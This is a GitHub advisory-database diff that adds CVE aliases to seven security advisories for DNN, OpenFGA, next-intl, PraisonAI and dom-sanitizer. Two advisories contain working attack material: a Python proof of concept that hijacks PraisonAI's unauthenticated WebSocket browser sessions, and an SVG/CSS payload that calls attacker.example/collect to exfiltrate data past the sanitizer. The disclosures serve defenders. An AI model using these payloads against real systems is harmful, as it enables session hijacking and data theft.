github
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-2rhw-gw3f-477j/GHSA-2rhw-gw3f-477j.json‎
Lines changed: 4 additions & 2 deletions b/‎advisories/github-reviewed/2026/04/GHSA-2rhw-gw3f-477j/GHSA-2rhw-gw3f-477j.json‎
Lines changed: 4 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-68m9-983m-f3v5/GHSA-68m9-983m-f3v5.json‎
Lines changed: 4 additions & 2 deletions b/‎advisories/github-reviewed/2026/04/GHSA-68m9-983m-f3v5/GHSA-68m9-983m-f3v5.json‎
Lines changed: 4 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-8f24-v5vv-gm5j/GHSA-8f24-v5vv-gm5j.json‎
Lines changed: 4 additions & 2 deletions b/‎advisories/github-reviewed/2026/04/GHSA-8f24-v5vv-gm5j/GHSA-8f24-v5vv-gm5j.json‎
Lines changed: 4 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-8x8f-54wf-vv92/GHSA-8x8f-54wf-vv92.json‎
Lines changed: 9 additions & 3 deletions b/‎advisories/github-reviewed/2026/04/GHSA-8x8f-54wf-vv92/GHSA-8x8f-54wf-vv92.json‎
Lines changed: 9 additions & 3 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-93vf-569f-22cq/GHSA-93vf-569f-22cq.json‎
Lines changed: 4 additions & 2 deletions b/‎advisories/github-reviewed/2026/04/GHSA-93vf-569f-22cq/GHSA-93vf-569f-22cq.json‎
Lines changed: 4 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-ffq7-898w-9jc4/GHSA-ffq7-898w-9jc4.json‎
Lines changed: 4 additions & 2 deletions b/‎advisories/github-reviewed/2026/04/GHSA-ffq7-898w-9jc4/GHSA-ffq7-898w-9jc4.json‎
Lines changed: 4 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-fpj4-9qhx-5m6m/GHSA-fpj4-9qhx-5m6m.json‎
Lines changed: 4 additions & 2 deletions b/‎advisories/github-reviewed/2026/04/GHSA-fpj4-9qhx-5m6m/GHSA-fpj4-9qhx-5m6m.json‎
Lines changed: 4 additions & 2 deletions
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-2rhw-gw3f-477j",
-  "modified": "2026-04-10T21:07:13Z",
+  "modified": "2026-04-14T21:55:20Z",
   "published": "2026-04-10T21:07:13Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40306"
+  ],
   "summary": "DNN: Same HostGUID for all new installs",
   "details": "All new installations DNN 10.x.x - 10.2.1 installs, have the same Host GUID. This does not affect upgrades from 9.x.x.",
   "severity": [],
 
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-68m9-983m-f3v5",
-  "modified": "2026-04-08T21:51:41Z",
+  "modified": "2026-04-14T21:54:49Z",
   "published": "2026-04-08T21:51:41Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40293"
+  ],
   "summary": "OpenFGA: Unauthenticated playground endpoint discloses preshared API key in HTML response",
   "details": "### Description\nWhen OpenFGA is configured to use preshared-key authentication with the built-in playground enabled, the local server includes the preshared API key in the HTML response of the /playground endpoint. The /playground endpoint is enabled by default and does not require authentication. It is intended for local development and debugging and is not designed to be exposed to production environments.\n\n\n### Am I Affected?\nYou are affected if you meet each of the following preconditions:\n* You are running OpenFGA with --authn-method preshared, and\n* The playground is enabled, and\n* The playground endpoint is accessible beyond localhost or trusted networks.\n\n### Fix\nUpgrade to OpenFGA v1.14.0, or disable the playground by running `./openfga run --playground-enabled=false.`",
   "severity": [
 
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8f24-v5vv-gm5j",
-  "modified": "2026-04-10T21:03:55Z",
+  "modified": "2026-04-14T21:54:59Z",
   "published": "2026-04-10T21:03:55Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40299"
+  ],
   "summary": "next-intl has an open redirect vulnerability",
   "details": "### Impact\n\nApplications using the `next-intl` middleware with `localePrefix: 'as-needed'` could construct URLs where path handling and the WHATWG URL parser resolved a relative redirect target to another host (e.g. scheme-relative `//` or control characters stripped by the URL parser), so the middleware could redirect the browser off-site while the user still started from a trusted app URL.\n\n### Patches\n\nThe problem has been patched, please update to [`next-intl@4.9.1`](https://github.com/amannn/next-intl/releases/tag/v4.9.1).\n\n### Credits\n\nMany thanks to [Joni Liljeblad](https://github.com/joniumGit) from [Oura](https://ouraring.com) for responsibly disclosing the vulnerability and for suggesting the fix.",
   "severity": [
 
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8x8f-54wf-vv92",
-  "modified": "2026-04-10T19:32:59Z",
+  "modified": "2026-04-14T21:54:41Z",
   "published": "2026-04-10T19:32:59Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40289"
+  ],
   "summary": "PraisonAI Browser Server allows unauthenticated WebSocket clients to hijack connected extension sessions",
   "details": "### Summary\n`praisonai browser start` exposes the browser bridge on `0.0.0.0` by default, and its `/ws` endpoint accepts websocket clients that omit the `Origin` header entirely. An unauthenticated network client can connect as a fake controller, send `start_session`, cause the server to forward `start_automation` to another connected browser-extension websocket, and receive the resulting action/status stream back over that hijacked session. This allows unauthorized remote use of a connected browser automation session without any credentials.\n\n### Details\nThe issue is in the browser bridge trust model. The code assumes that websocket peers are trusted local components, but that assumption is not enforced.\n\nRelevant code paths:\n\n- Default network exposure: `src/praisonai/praisonai/browser/server.py:38-44` and `src/praisonai/praisonai/browser/cli.py:25-30`\n- Optional-only origin validation: `src/praisonai/praisonai/browser/server.py:156-173`\n- Unauthenticated `start_session` routing: `src/praisonai/praisonai/browser/server.py:237-240` and `src/praisonai/praisonai/browser/server.py:289-302`\n- Cross-connection forwarding to any other idle websocket: `src/praisonai/praisonai/browser/server.py:344-356`\n- Broadcast of action output back to the initiating unauthenticated client: `src/praisonai/praisonai/browser/server.py:412-423` and `src/praisonai/praisonai/browser/server.py:462-476`\n\nThe handshake logic only checks origin when an `Origin` header is present:\n\n```python\norigin = websocket.headers.get(\"origin\")\nif origin:\n    ...\n    if not is_allowed:\n        await websocket.close(code=1008)\n        return\n\nawait websocket.accept()\n```\n\nThis means a non-browser client can omit `Origin` completely and still be accepted.\n\nAfter that, any connected client can send `{\"type\":\"start_session\", ...}`. The server then looks for the first other websocket without a session and sends it a `start_automation` message:\n\n```python\nif client_conn != conn and client_conn.websocket and not client_conn.session_id:\n    await client_conn.websocket.send_text(json_mod.dumps(start_msg))\n    client_conn.session_id = session_id\n    sent_to_extension = True\n    break\n```\n\nWhen the extension-side connection responds with an observation, the resulting action is broadcast to every websocket with the same `session_id`, including the unauthenticated initiating client:\n\n```python\naction_response = {\n    \"type\": \"action\",\n    \"session_id\": session_id,\n    **action,\n}\n\nfor client_id, client_conn in self._connections.items():\n    if client_conn.session_id == session_id and client_conn != conn:\n        await client_conn.websocket.send_json(action_response)\n```\n\nI verified this on the latest local checkout: `praisonai` version `4.5.134` at commit `365f75040f4e279736160f4b6bdb2bdb7a3968d4`.\n\n### PoC\nI used `tmp/pocs/poc.sh` to reproduce the issue from a clean local checkout.\n\nRun:\n\n```bash\ncd \"/Users/r1zzg0d/Documents/CVE hunting/targets/PraisonAI\"\n./tmp/pocs/poc.sh\n```\n\nExpected vulnerable output:\n\n```text\n[+] No-Origin client accepted: True\n[+] Session forwarded to extension: True\n[+] Action broadcast to attacker: True\n[+] RESULT: VULNERABLE - unauthenticated client can hijack browser sessions.\n```\n\nStep-by-step reproduction:\n\n1. Start the local browser bridge from the checked-out source tree.\n2. Connect one websocket as a stand-in extension using a valid `chrome-extension://<32-char-id>` origin.\n3. Connect a second websocket with no `Origin` header.\n4. Send `start_session` from the unauthenticated websocket.\n5. Observe that the server forwards `start_automation` to the extension websocket.\n6. Send an `observation` from the extension websocket using the assigned `session_id`.\n7. Observe that the resulting `action` and completion `status` are delivered back to the unauthenticated initiating websocket.\n\n`tmp/pocs/poc.sh`:\n\n```sh\n#!/bin/sh\nset -eu\n\nSCRIPT_DIR=\"$(CDPATH= cd -- \"$(dirname -- \"$0\")\" && pwd)\"\n\ncd \"$SCRIPT_DIR/../..\"\n\nexec uv run --no-project \\\n  --with fastapi \\\n  --with uvicorn \\\n  --with websockets \\\n  python3 \"$SCRIPT_DIR/poc.py\"\n```\n\n`tmp/pocs/poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Verify unauthenticated browser-server session hijack on current source tree.\n\nThis PoC starts the BrowserServer from the local checkout, connects:\n1. A fake extension client using an arbitrary chrome-extension Origin\n2. An attacker client with no Origin header\n\nIt then shows the attacker can start a session that the server forwards to the\nextension connection, and can receive the resulting action broadcast back over\nthat hijacked session.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport json\nimport os\nimport socket\nimport sys\nimport tempfile\nfrom pathlib import Path\n\n\nREPO_ROOT = Path(__file__).resolve().parents[2]\nSRC_ROOT = REPO_ROOT / \"src\" / \"praisonai\"\nif str(SRC_ROOT) not in sys.path:\n    sys.path.insert(0, str(SRC_ROOT))\n\n\ndef _pick_port() -> int:\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n        sock.bind((\"127.0.0.1\", 0))\n        return sock.getsockname()[1]\n\n\nclass DummyBrowserAgent:\n    \"\"\"Minimal stub to avoid real LLM/browser dependencies during validation.\"\"\"\n\n    def __init__(self, model: str, max_steps: int, verbose: bool):\n        self.model = model\n        self.max_steps = max_steps\n        self.verbose = verbose\n\n    async def aprocess_observation(self, message: dict) -> dict:\n        return {\n            \"action\": \"done\",\n            \"thought\": f\"processed: {message.get('url', '')}\",\n            \"done\": True,\n            \"summary\": \"dummy action generated\",\n        }\n\n\nasync def main() -> int:\n    temp_home = tempfile.TemporaryDirectory(prefix=\"praisonai-browser-poc-\")\n    os.environ[\"HOME\"] = temp_home.name\n\n    from praisonai.browser.server import BrowserServer\n    import praisonai.browser.agent as agent_module\n    import uvicorn\n    import websockets\n\n    agent_module.BrowserAgent = DummyBrowserAgent\n\n    port = _pick_port()\n    server = BrowserServer(host=\"127.0.0.1\", port=port, verbose=False)\n    app = server._get_app()\n\n    config = uvicorn.Config(\n        app,\n        host=\"127.0.0.1\",\n        port=port,\n        log_level=\"error\",\n        access_log=False,\n    )\n    uvicorn_server = uvicorn.Server(config)\n    server_task = asyncio.create_task(uvicorn_server.serve())\n\n    try:\n        for _ in range(50):\n            if uvicorn_server.started:\n                break\n            await asyncio.sleep(0.1)\n        else:\n            raise RuntimeError(\"Uvicorn server did not start in time\")\n\n        ws_url = f\"ws://127.0.0.1:{port}/ws\"\n\n        async with websockets.connect(\n            ws_url,\n            origin=\"chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\",\n        ) as extension_ws:\n            extension_welcome = json.loads(await extension_ws.recv())\n            print(\"[+] Extension welcome:\", extension_welcome)\n\n            async with websockets.connect(ws_url) as attacker_ws:\n                attacker_welcome = json.loads(await attacker_ws.recv())\n                print(\"[+] Attacker welcome:\", attacker_welcome)\n\n                await attacker_ws.send(\n                    json.dumps(\n                        {\n                            \"type\": \"start_session\",\n                            \"goal\": \"Open internal admin page and reveal secrets\",\n                            \"model\": \"dummy\",\n                            \"max_steps\": 1,\n                        }\n                    )\n                )\n                start_response = json.loads(await attacker_ws.recv())\n                print(\"[+] Attacker start_session response:\", start_response)\n\n                hijacked_msg = json.loads(await extension_ws.recv())\n                print(\"[+] Extension received forwarded message:\", hijacked_msg)\n\n                session_id = hijacked_msg[\"session_id\"]\n                await extension_ws.send(\n                    json.dumps(\n                        {\n                            \"type\": \"observation\",\n                            \"session_id\": session_id,\n                            \"step_number\": 1,\n                            \"url\": \"https://victim.example/internal\",\n                            \"elements\": [{\"selector\": \"#secret\"}],\n                        }\n                    )\n                )\n\n                attacker_action = json.loads(await attacker_ws.recv())\n                attacker_status = json.loads(await attacker_ws.recv())\n                print(\"[+] Attacker received broadcast action:\", attacker_action)\n                print(\"[+] Attacker received completion status:\", attacker_status)\n\n                no_origin_client_connected = attacker_welcome.get(\"status\") == \"connected\"\n                forwarded_to_extension = hijacked_msg.get(\"type\") == \"start_automation\"\n                action_broadcasted = (\n                    attacker_action.get(\"type\") == \"action\"\n                    and attacker_action.get(\"session_id\") == session_id\n                )\n\n                print(\"[+] No-Origin client accepted:\", no_origin_client_connected)\n                print(\"[+] Session forwarded to extension:\", forwarded_to_extension)\n                print(\"[+] Action broadcast to attacker:\", action_broadcasted)\n\n                if no_origin_client_connected and forwarded_to_extension and action_broadcasted:\n                    print(\"[+] RESULT: VULNERABLE - unauthenticated client can hijack browser sessions.\")\n                    return 0\n\n                print(\"[-] RESULT: NOT VULNERABLE\")\n                return 1\n    finally:\n        uvicorn_server.should_exit = True\n        try:\n            await asyncio.wait_for(server_task, timeout=5)\n        except Exception:\n            server_task.cancel()\n        temp_home.cleanup()\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(asyncio.run(main()))\n```\n\n`tmp/pocs/poc.py` starts a temporary local server, stubs the browser agent, opens both websocket roles, and prints the final vulnerability conditions explicitly.\n\nPoC Video:\n\nhttps://github.com/user-attachments/assets/df078542-bbdc-4341-b438-89c86365009e\n\n\n\n### Impact\nThis is an unauthenticated remote-control vulnerability in the browser automation bridge. Any network client that can reach the exposed bridge can impersonate the controller side of the workflow, hijack an available connected extension session, and receive automation output from that hijacked session. In real deployments, this can allow unauthorized browser actions, misuse of model-backed automation, and leakage of sensitive page context or automation results.\n\nWho is impacted:\n\n- Operators who run `praisonai browser start` with the default host binding\n- Users with an active connected browser extension session\n- Environments where the bridge is reachable from other hosts on the network\n\n### Recommended Fix\nSuggested remediations:\n\n1. Require explicit authentication for every websocket client connecting to `/ws`.\n2. Reject websocket handshakes that omit `Origin`, unless they are using a separate authenticated localhost-only transport.\n3. Bind the browser bridge to `127.0.0.1` by default and require explicit operator opt-in for non-loopback exposure.\n4. Do not route `start_session` to “the first other idle connection”; instead, pair authenticated controller and extension clients explicitly.",
   "severity": [
@@ -63,6 +65,10 @@
       "type": "WEB",
       "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40289"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/MervinPraison/PraisonAI"
@@ -79,6 +85,6 @@
     "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2026-04-10T19:32:59Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-04-14T04:17:12Z"
   }
 }
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-93vf-569f-22cq",
-  "modified": "2026-04-10T21:08:31Z",
+  "modified": "2026-04-14T21:55:07Z",
   "published": "2026-04-10T21:08:30Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40301"
+  ],
   "summary": "rhukster/dom-sanitizer: SVG <style> tag allows CSS injection via unfiltered url() and @import directives",
   "details": "### Summary\nDOMSanitizer::sanitize() allows <style> elements in SVG content but never inspects their text content. CSS url() references and @import rules pass through unfiltered, causing the browser to issue HTTP requests to attacker-controlled hosts when the sanitized SVG is rendered.\n\n### Details\nIn src/DOMSanitizer.php, 'style' is listed in the SVG allowed-tag array (line 31). The sanitize() method (lines 111–133) removes disallowed tags and strips attributes matching the EXTERNAL_URL pattern — but text node content of <style> elements is never examined. Because CSS rules live in text nodes, EXTERNAL_URL filtering never applies to them.\n\nVulnerable code (src/DOMSanitizer.php, line 31):\n```php\n'svg' => ['style', 'path', 'rect', 'circle', ...],\n```\n\nThe following payload survives sanitize() intact:\n```svg\n<svg xmlns=\"http://www.w3.org/2000/svg\">\n  <style>* { background: url(https://attacker.example/collect); }</style>\n</svg>\n```\n\n### PoC\n```php\n<?php\nrequire 'vendor/autoload.php';\nuse Rhukster\\DomSanitizer\\DOMSanitizer;\n\n$svg = '<svg xmlns=\"http://www.w3.org/2000/svg\"><style>* { background: url(https://attacker.example/collect); }</style></svg>';\n$sanitizer = new DOMSanitizer(DOMSanitizer::SVG);\n$output = $sanitizer->sanitize($svg);\necho $output; // <style> with url() survives unchanged — confirmed exploitable in Statamic CMS (GHSA-g8hv-8w5p-cvqg)\n```\n\nRender the returned string in a browser. The browser sends a GET request to https://attacker.example/collect.\n\n### Impact\nAny application that passes user-controlled SVG through DOMSanitizer::sanitize() and renders the output in a browser is vulnerable. An attacker can exfiltrate the page URL to an external server, load arbitrary external stylesheets, and on some browsers leverage CSS attribute selectors + url() to exfiltrate cookie or session token values.",
   "severity": [
 
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-ffq7-898w-9jc4",
-  "modified": "2026-04-10T20:42:48Z",
+  "modified": "2026-04-14T21:56:18Z",
   "published": "2026-04-10T20:42:48Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40321"
+  ],
   "summary": "DotNetNuke.Core has stored cross-site-scripting (XSS) via SVG upload",
   "details": "A user could upload a specially crafted SVG file that could include scripts that can target both authenticated and unauthenticated DNN users. The impact is increased if the scripts are run by a power user.",
   "severity": [
 
@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-fpj4-9qhx-5m6m",
-  "modified": "2026-04-10T21:07:08Z",
+  "modified": "2026-04-14T21:55:14Z",
   "published": "2026-04-10T21:07:08Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-40305"
+  ],
   "summary": "DNN: Force Friend Request Acceptance",
   "details": "In the friends feature, a user could craft a request that would force the acceptance of a friend request on another user.",
   "severity": [